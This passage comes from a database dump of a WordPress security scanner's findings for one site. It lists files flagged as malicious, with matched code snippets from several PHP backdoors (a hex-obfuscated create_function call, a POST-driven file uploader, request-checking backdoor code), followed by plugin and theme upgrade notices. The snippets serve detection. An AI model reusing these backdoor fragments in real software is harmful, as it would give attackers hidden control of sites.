WordPress.','a:6:{s:4:\"file\";s:20:\"wp-includes/vars.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:1;s:6:\"canFix\";b:1;s:9:\"canDelete\";b:0;s:10:\"haveIssues\";s:4:\"core\";}'),(2212,1629633443,1629633443,'new','file',100,'84ab0a90b454a5ca6e184cdb0fb0492a','21eb047566e4f2fbc78090b8665d3ae5','File appears to be malicious or unsafe: wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">&quot;\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e&quot;</strong> <br><br>The issue type is: <strong>Suspicious:PHP/hexcreatefn.6023</strong><br>Description: <strong>Suspicious code often used to hide a backdoor</strong>','a:9:{s:4:\"file\";s:79:\"wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php\";s:4:\"shac\";s:64:\"F8BD484BC914E536A148EC3743C21CA09FE81A825A1C539EC16592D4D86B8C6F\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(2213,1629633443,1629633443,'new','file',100,'7d330dfa6d96bdc5a1a268dc53e63860','21eb047566e4f2fbc78090b8665d3ae5','File appears to be malicious or unsafe: wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">&quot;\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e&quot;</strong> <br><br>The issue type is: <strong>Suspicious:PHP/hexcreatefn.6023</strong><br>Description: <strong>Suspicious code often used to hide a backdoor</strong>','a:9:{s:4:\"file\";s:78:\"wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php\";s:4:\"shac\";s:64:\"F8BD484BC914E536A148EC3743C21CA09FE81A825A1C539EC16592D4D86B8C6F\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(2214,1629633443,1629633443,'new','file',100,'d30303ba921fb618c6f1e83dc30082ba','9fc472080e48b4aaf6a3b6ba1833977b','File appears to be malicious or unsafe: wp-includes/vars.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">&lt;?php<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span>/**<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span> * Creates common globals for the rest of WordPress<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span> *<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span> * Sets $pagenow global which is the current page. Checks<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span> * for the browser to set which one is currently being used.<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span> *<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span> * Det...</strong> <br><br>The issue type is: <strong>IOC:PHP/r-wpi.B.8902</strong><br>Description: <strong>WordPress core files including other files using error suppression, typically indicates that site is compromised or has been compromised in the past</strong>','a:10:{s:4:\"file\";s:20:\"wp-includes/vars.php\";s:4:\"shac\";s:64:\"7807A6BEAA5F5E170CA732FAFDF23BA52794477454C7ECFE9E580569B833B61D\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:1;s:6:\"canFix\";b:1;s:9:\"canDelete\";b:0;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(2215,1629633444,1629633444,'new','file',100,'b4041acc871253b7b8b687185e9cf914','a47247840498364ccd540de9630a4b9b','File appears to be malicious or unsafe: wp-admin/css/colors/ectoplasm/0.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">if($_POST[&#039;opt&#039;] == &#039;chmod&#039;){<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span>        if(isset($_POST[&#039;perm&#039;])){<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span>            if(chmod(</strong> <br><br>The issue type is: <strong>Backdoor:PHP/Generic.153</strong><br>Description: <strong>A malicious file uploader known as Generic</strong>','a:9:{s:4:\"file\";s:35:\"wp-admin/css/colors/ectoplasm/0.php\";s:4:\"shac\";s:64:\"1EBAE38033D4506A170E5FC9DAE6970FDB8EE1A31C084B307B6709B55618E941\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(2216,1629633444,1629633444,'new','file',100,'d4bf3001ecd4ac2b7330d6f684e9d009','21eb047566e4f2fbc78090b8665d3ae5','File appears to be malicious or unsafe: wp-content/themes/newsmag/assets/sass/elements/elements/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">&quot;\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e&quot;</strong> <br><br>The issue type is: <strong>Suspicious:PHP/hexcreatefn.6023</strong><br>Description: <strong>Suspicious code often used to hide a backdoor</strong>','a:9:{s:4:\"file\";s:65:\"wp-content/themes/newsmag/assets/sass/elements/elements/index.php\";s:4:\"shac\";s:64:\"F8BD484BC914E536A148EC3743C21CA09FE81A825A1C539EC16592D4D86B8C6F\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(2217,1629633444,1629633444,'new','file',100,'af4a05e27677d6dfd5efd0fded12c04b','b30dff860f2cd1c2a8feee0056941033','File appears to be malicious or unsafe: wp-includes/class.wp-includes.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">CheckSecureValue()<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span>{<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span><span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span><span class=\"wf-hex-sequence\">\\x09</span>if(isset($_REQUEST[&#039;secvalue&#039;]) === false)<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span><span class=\"wf-hex-sequence\">\\x09</span>{<span class=\"wf-hex-sequence\">\\x0d</span><span class=\"wf-hex-sequence\">\\x0a</span><span class=\"wf-hex-sequence\">\\x09</span><span class=\"wf-hex-sequence\">\\x09</span>echo &#039;&lt;fail&gt;Sec value dont match&lt;/fail&gt;&#039;;</strong> <br><br>The issue type is: <strong>Backdoor:PHP/sasdk123.4871</strong><br>Description: <strong>A backdoor known as sasdk123</strong>','a:9:{s:4:\"file\";s:33:\"wp-includes/class.wp-includes.php\";s:4:\"shac\";s:64:\"38FE7C758514D9B321A009F295DFE503806729CB177865E05761082AA9B45D67\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(2218,1629633444,1629633444,'new','file',100,'330c8faa2f5c8d1d8030745c504260a1','25d9347b1ded8e958f1b65b6e5934aea','File appears to be malicious or unsafe: wp-content/themes/gambit/inc/widgets/roman.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">if (isset($_POST)) walkArray($_POST</strong> <br><br>The issue type is: <strong>Backdoor:PHP/MPP.B.64</strong><br>Description: <strong>A backdoor known as MPP.B</strong>','a:9:{s:4:\"file\";s:46:\"wp-content/themes/gambit/inc/widgets/roman.php\";s:4:\"shac\";s:64:\"A4AB5AEC44226EE6629A11778B1EBAD9921C94FC8040CFE97FAEEE0F2D008B8F\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(2287,1629801262,1629801262,'new','wfUpgrade',75,'4215230377354b899cb8bd1b0ba04441','4215230377354b899cb8bd1b0ba04441','Your WordPress version is out of date','WordPress version 5.8 is now available. Please upgrade immediately to get the latest security updates from WordPress.','a:2:{s:14:\"currentVersion\";s:5:\"5.7.2\";s:10:\"newVersion\";s:3:\"5.8\";}'),(2288,1629801262,1629801262,'new','wfPluginUpgrade',50,'b2900c9e36203a82242f2bc11a7f2cd7','b2900c9e36203a82242f2bc11a7f2cd7','The Plugin \"Akismet Anti-Spam\" needs an upgrade (4.1.9 -> 4.1.11).','You need to upgrade \"Akismet Anti-Spam\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:17:\"Akismet Anti-Spam\";s:9:\"PluginURI\";s:20:\"https://akismet.com/\";s:7:\"Version\";s:5:\"4.1.9\";s:11:\"Description\";s:363:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. <cite>By <a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>.</cite>\";s:6:\"Author\";s:66:\"<a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>\";s:9:\"AuthorURI\";s:41:\"https://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:7:\"akismet\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:52:\"<a href=\"https://akismet.com/\">Akismet Anti-Spam</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:76:\"/home/equalitywalk.org.uk/public_html/wp-content/plugins/akismet/akismet.php\";s:10:\"newVersion\";s:6:\"4.1.11\";s:4:\"slug\";s:7:\"akismet\";s:5:\"wpURL\";s:37:\"https://wordpress.org/plugins/akismet\";s:10:\"vulnerable\";b:0;}'),(2289,1629801262,1629801262,'new','wfPluginUpgrade',50,'06a7ee476875b3ac408804fdd9dbddd5','06a7ee476875b3ac408804fdd9dbddd5','The Plugin \"All In One WP Security\" needs an upgrade (4.4.8 -> 4.4.9).','You need to upgrade \"All In One WP Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:22:\"All In One WP Security\";s:9:\"PluginURI\";s:71:\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\";s:7:\"Version\";s:5:\"4.4.8\";s:11:\"Description\";s:153:\"All round best WordPress security plugin! <cite>By <a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>.</cite>\";s:6:\"Author\";s:94:\"<a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>\";s:9:\"AuthorURI\";s:33:\"https://www.tipsandtricks-hq.com/\";s:10:\"TextDomain\";s:35:\"all-in-one-wp-security-and-firewall\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:108:\"<a href=\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\">All In One WP Security</a>\";s:10:\"AuthorName\";s:46:\"Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy\";s:10:\"pluginFile\";s:108:\"/home/equalitywalk.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php\";s:10:\"newVersion\";s:5:\"4.4.9\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"wpURL\";s:65:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall\";s:10:\"vulnerable\";b:0;}'),(2290,1629801262,1629801262,'new','wfPluginUpgrade',50,'27816f1db787fff78105122a66a15ee1','27816f1db787fff78105122a66a15ee1','The Plugin \"Wordfence Security\" needs an upgrade (7.5.4 -> 7.5.5).','You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:5:\"7.5.4\";s:11:\"Description\";s:131:\"Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>\";s:6:\"Author\";s:49:\"<a href=\"http://www.wordfence.com/\">Wordfence</a>\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:58:\"<a href=\"http://www.wordfence.com/\">Wordfence Security</a>\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:80:\"/home/equalitywalk.org.uk/public_html/wp-content/plugins/wordfence/wordfence.php\";s:10:\"newVersion\";s:5:\"7.5.5\";s:4:\"slug\";s:9:\"wordfence\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:10:\"vulnerable\";b:0;}'),(2291,1629801262,1629801262,'new','wfPluginUpgrade',100,'283f9ed349533149301fd96d452980c2','283f9ed349533149301fd96d452980c2','The Plugin \"WP Cerber Security, Anti-spam &amp; Malware Scan\" needs an upgrade (8.8.5 -> 8.9.3).','You need to upgrade \"WP Cerber Security, Anti-spam &amp; Malware Scan\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:48:\"WP Cerber Security, Anti-spam &amp; Malware Scan\";s:9:\"PluginURI\";s:20:\"https://wpcerber.com\";s:7:\"Version\";s:5:\"8.8.5\";s:11:\"Description\";s:408:\"Defends WordPress against hacker attacks, spam, trojans, and viruses. Malware scanner and integrity checker. Hardening WordPress with a set of comprehensive security algorithms. Spam protection with a sophisticated bot detection engine and reCAPTCHA. Tracks user and intruder activity with powerful email, mobile and desktop notifications. <cite>By <a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>\";s:9:\"AuthorURI\";s:20:\"https://wpcerber.com\";s:10:\"TextDomain\";s:9:\"wp-cerber\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:83:\"<a href=\"https://wpcerber.com\">WP Cerber Security, Anti-spam &amp; Malware Scan</a>\";s:10:\"AuthorName\";s:16:\"Cerber Tech Inc.\";s:10:\"pluginFile\";s:80:\"/home/equalitywalk.org.uk/public_html/wp-content/plugins/wp-cerber/wp-cerber.php\";s:10:\"newVersion\";s:5:\"8.9.3\";s:4:\"slug\";s:9:\"wp-cerber\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wp-cerber\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}'),(2292,1629801262,1629801262,'new','wfThemeUpgrade',50,'d0fd5c3317d8624e62cf86316fb563d5','d0fd5c3317d8624e62cf86316fb563d5','The Theme \"Advance\" needs an upgrade (1.1.9 -> 1.9.0).','You need to upgrade \"Advance\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.9.0\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/advance.1.9.0.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/advance/\";s:4:\"Name\";s:7:\"Advance\";s:4:\"name\";s:7:\"Advance\";s:7:\"version\";s:5:\"1.1.9\";s:10:\"vulnerable\";b:0;}'),(2293,1629801262,1629801262,'new','wfThemeUpgrade',50,'bd61b86a185185992212307fcda8f939','bd61b86a185185992212307fcda8f939','The Theme \"Auberge\" needs an upgrade (2.1.1 -> 2.7.6).','You need to upgrade \"Auberge\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.7.6\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/auberge.2.7.6.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/auberge/\";s:4:\"Name\";s:7:\"Auberge\";s:4:\"name\";s:7:\"Auberge\";s:7:\"version\";s:5:\"2.1.1\";s:10:\"vulnerable\";b:0;}'),(2294,1629801262,1629801262,'new','wfThemeUpgrade',50,'1e68668375f4d811554bada4ca41eae2','1e68668375f4d811554bada4ca41eae2','The Theme \"Catch Flames\" needs an upgrade (3.2 -> 3.6).','You need to upgrade \"Catch Flames\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"3.6\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/catch-flames.3.6.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/catch-flames/\";s:4:\"Name\";s:12:\"Catch Flames\";s:4:\"name\";s:12:\"Catch Flames\";s:7:\"version\";s:3:\"3.2\";s:10:\"vulnerable\";b:0;}'),(2295,1629801262,1629801262,'new','wfThemeUpgrade',50,'2ac3002ce1eb295ec6469ef1f60664bc','2ac3002ce1eb295ec6469ef1f60664bc','The Theme \"Catch Responsive\" needs an upgrade (2.5 -> 2.7.8).','You need to upgrade \"Catch Responsive\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.7.8\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/theme/catch-responsive.2.7.8.zip\";s:3:\"URL\";s:46:\"https://wordpress.org/themes/catch-responsive/\";s:4:\"Name\";s:16:\"Catch Responsive\";s:4:\"name\";s:16:\"Catch Responsive\";s:7:\"version\";s:3:\"2.5\";s:10:\"vulnerable\";b:0;}'),(2296,1629801262,1629801262,'new','wfThemeUpgrade',50,'33a9613a81fdfc90e76ad87bfd1e47c8','33a9613a81fdfc90e76ad87bfd1e47c8','The Theme \"Chronus\" needs an upgrade (1.2.2 -> 2.0.4).','You need to upgrade \"Chronus\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.0.4\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/chronus.2.0.4.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/chronus/\";s:4:\"Name\";s:7:\"Chronus\";s:4:\"name\";s:7:\"Chronus\";s:7:\"version\";s:5:\"1.2.2\";s:10:\"vulnerable\";b:0;}'),(2297,1629801262,1629801262,'new','wfThemeUpgrade',50,'d231b76ece2c2a83d409d07aa4c16658','d231b76ece2c2a83d409d07aa4c16658','The Theme \"City Store\" needs an upgrade (1.3.3 -> 1.4.5).','You need to upgrade \"City Store\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.4.5\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/city-store.1.4.5.zip\";s:3:\"URL\";s:40:\"https://wordpress.org/themes/city-store/\";s:4:\"Name\";s:10:\"City Store\";s:4:\"name\";s:10:\"City Store\";s:7:\"version\";s:5:\"1.3.3\";s:10:\"vulnerable\";b:0;}'),(2298,1629801262,1629801262,'new','wfThemeUpgrade',50,'c59f48193e81295bb09a2490c94f9386','c59f48193e81295bb09a2490c94f9386','The Theme \"Edge\" needs an upgrade (1.1.1.1 -> 2.0.6).','You need to upgrade \"Edge\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.0.6\";s:7:\"package\";s:52:\"https://downloads.wordpress.org/theme/edge.2.0.6.zip\";s:3:\"URL\";s:34:\"https://wordpress.org/themes/edge/\";s:4:\"Name\";s:4:\"Edge\";s:4:\"name\";s:4:\"Edge\";s:7:\"version\";s:7:\"1.1.1.1\";s:10:\"vulnerable\";b:0;}'),(2299,1629801262,1629801262,'new','wfThemeUpgrade',50,'51e131ce42b996c9c2aaf31fc3a3281d','51e131ce42b996c9c2aaf31fc3a3281d','The Theme \"Education Hub\" needs an upgrade (1.9.4 -> 2.3.2).','You need to upgrade \"Education Hub\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.3.2\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/education-hub.2.3.2.zip\";s:3:\"URL\";s:43:\"https://wordpress.org/themes/education-hub/\";s:4:\"Name\";s:13:\"Education Hub\";s:4:\"name\";s:13:\"Education Hub\";s:7:\"version\";s:5:\"1.9.4\";s:10:\"vulnerable\";b:0;}'),(2300,1629801262,1629801262,'new','wfThemeUpgrade',50,'f7ee044898e7e3790374764e8ce851cb','f7ee044898e7e3790374764e8ce851cb','The Theme \"Enigma\" needs an upgrade (2.8.2 -> 7.1.9).','You need to upgrade \"Enigma\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"7.1.9\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/enigma.7.1.9.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/enigma/\";s:4:\"Name\";s:6:\"Enigma\";s:4:\"name\";s:6:\"Enigma\";s:7:\"version\";s:5:\"2.8.2\";s:10:\"vulnerable\";b:0;}'),(2301,1629801262,1629801262,'new','wfThemeUpgrade',50,'7eeca5238ce2a75fe64eec4bd4934833','7eeca5238ce2a75fe64eec4bd4934833','The Theme \"Event\" needs an upgrade (1.0.7 -> 1.1.8).','You need to upgrade \"Event\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.8\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/event.1.1.8.zip\";s:3:\"URL\";s:35:\"https://wordpress.org/themes/event/\";s:4:\"Name\";s:5:\"Event\";s:4:\"name\";s:5:\"Event\";s:7:\"version\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}'),(2302,1629801262,1629801262,'new','wfThemeUpgrade',50,'e73f2135eac1389ef55e6e61ca2f2cae','e73f2135eac1389ef55e6e61ca2f2cae','The Theme \"Exoplanet\" needs an upgrade (1.5.6 -> 1.9.1).','You need to upgrade \"Exoplanet\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.9.1\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/exoplanet.1.9.1.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/exoplanet/\";s:4:\"Name\";s:9:\"Exoplanet\";s:4:\"name\";s:9:\"Exoplanet\";s:7:\"version\";s:5:\"1.5.6\";s:10:\"vulnerable\";b:0;}'),(2303,1629801262,1629801262,'new','wfThemeUpgrade',50,'98e3b865ae1659596a53b968bc134c58','98e3b865ae1659596a53b968bc134c58','The Theme \"Gambit\" needs an upgrade (1.0.8 -> 2.0.3).','You need to upgrade \"Gambit\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.0.3\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/gambit.2.0.3.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/gambit/\";s:4:\"Name\";s:6:\"Gambit\";s:4:\"name\";s:6:\"Gambit\";s:7:\"version\";s:5:\"1.0.8\";s:10:\"vulnerable\";b:0;}'),(2304,1629801262,1629801262,'new','wfThemeUpgrade',50,'2b1ac8cca8456d18f6102a8e671c2c88','2b1ac8cca8456d18f6102a8e671c2c88','The Theme \"Graduate\" needs an upgrade (1.2 -> 1.6.0).','You need to upgrade \"Graduate\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.6.0\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/graduate.1.6.0.zip\";s:3:\"URL\";s:38:\"https://wordpress.org/themes/graduate/\";s:4:\"Name\";s:8:\"Graduate\";s:4:\"name\";s:8:\"Graduate\";s:7:\"version\";s:3:\"1.2\";s:10:\"vulnerable\";b:0;}'),(2305,1629801262,1629801262,'new','wfThemeUpgrade',50,'5796e294e9d0805935018707d7804f9c','5796e294e9d0805935018707d7804f9c','The Theme \"Graphene\" needs an upgrade (1.9.4.2 -> 2.8.5).','You need to upgrade \"Graphene\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.8.5\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/graphene.2.8.5.zip\";s:3:\"URL\";s:38:\"https://wordpress.org/themes/graphene/\";s:4:\"Name\";s:8:\"Graphene\";s:4:\"name\";s:8:\"Graphene\";s:7:\"version\";s:7:\"1.9.4.2\";s:10:\"vulnerable\";b:0;}'),(2306,1629801262,1629801262,'new','wfThemeUpgrade',50,'aca59808a3b3df2f6beae9ec4ed85db0','aca59808a3b3df2f6beae9ec4ed85db0','The Theme \"Hemingway\" needs an upgrade (1.56 -> 2.1.2).','You need to upgrade \"Hemingway\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.1.2\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/hemingway.2.1.2.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/hemingway/\";s:4:\"Name\";s:9:\"Hemingway\";s:4:\"name\";s:9:\"Hemingway\";s:7:\"version\";s:4:\"1.56\";s:10:\"vulnerable\";b:0;}'),(2307,1629801262,1629801262,'new','wfThemeUpgrade',50,'496730462093e7c5fb957aaf034f1dbd','496730462093e7c5fb957aaf034f1dbd','The Theme \"HitMag\" needs an upgrade (1.0.9 -> 1.2.9).','You need to upgrade \"HitMag\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.2.9\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/hitmag.1.2.9.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/hitmag/\";s:4:\"Name\";s:6:\"HitMag\";s:4:\"name\";s:6:\"HitMag\";s:7:\"version\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}'),(2308,1629801262,1629801262,'new','wfThemeUpgrade',50,'edc0683b4930ef2d97da2605c4b02ee7','edc0683b4930ef2d97da2605c4b02ee7','The Theme \"Lovecraft\" needs an upgrade (1.17 -> 2.0.1).','You need to upgrade \"Lovecraft\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.0.1\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/lovecraft.2.0.1.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/lovecraft/\";s:4:\"Name\";s:9:\"Lovecraft\";s:4:\"name\";s:9:\"Lovecraft\";s:7:\"version\";s:4:\"1.17\";s:10:\"vulnerable\";b:0;}'),(2309,1629801262,1629801262,'new','wfThemeUpgrade',50,'d39245cfa091a5bab63f29ae67ee867a','d39245cfa091a5bab63f29ae67ee867a','The Theme \"Metro Magazine\" needs an upgrade (1.0.6 -> 1.3.6).','You need to upgrade \"Metro Magazine\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.3.6\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/metro-magazine.1.3.6.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/metro-magazine/\";s:4:\"Name\";s:14:\"Metro Magazine\";s:4:\"name\";s:14:\"Metro Magazine\";s:7:\"version\";s:5:\"1.0.6\";s:10:\"vulnerable\";b:0;}'),(2310,1629801262,1629801262,'new','wfThemeUpgrade',50,'0a7979d456c79bd6eaca4e96ae46f148','0a7979d456c79bd6eaca4e96ae46f148','The Theme \"Monograph\" needs an upgrade (1.4.1 -> 1.6.1).','You need to upgrade \"Monograph\" to the newest version to ensure you have any security fixes the developer has 